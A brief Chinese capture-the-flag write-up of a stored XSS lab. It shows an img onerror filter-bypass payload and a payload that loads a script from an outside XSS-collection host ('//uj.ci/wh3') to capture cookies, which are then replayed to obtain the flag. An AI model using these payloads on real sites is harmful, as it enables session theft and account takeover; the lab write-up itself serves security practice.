进入靶场
随便提交看看
访问此路径
知道这是存储型xss注入
开始xss注入
试试<script>alert('xss')</script>
不行,是把script过滤了
换一个
<img src=# onerror=alert(1)>
可以
寻找平台,创建项目
选择超强默认模式
之前测试img可以成功传入,所以选择这个
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//uj.ci/wh3';>
记录cookie和url
先改url
显示没登陆是因为cookie没改
f12修改cookie
成功得到flag
我以为和早上的那道题肯定有点区别,可能是plus版,结果就是同一个题。。。。。。。。